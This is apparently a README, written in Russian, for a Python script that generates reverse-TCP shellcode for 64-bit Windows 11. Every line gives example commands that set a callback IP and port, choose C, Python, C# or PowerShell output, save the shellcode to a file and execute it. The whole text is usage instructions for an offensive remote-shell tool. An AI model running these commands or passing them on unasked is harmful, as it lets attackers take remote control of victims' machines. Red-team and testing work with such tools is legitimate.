
Шеллкоды для Windows >= 11 x64
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443
Язык по умолчанию — C, также доступны Python, C# и PowerShell:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell
Для сохранения в файл:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true
Файл по умолчанию — output.bin:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin
Для тестирования и выполнения:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true
И:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin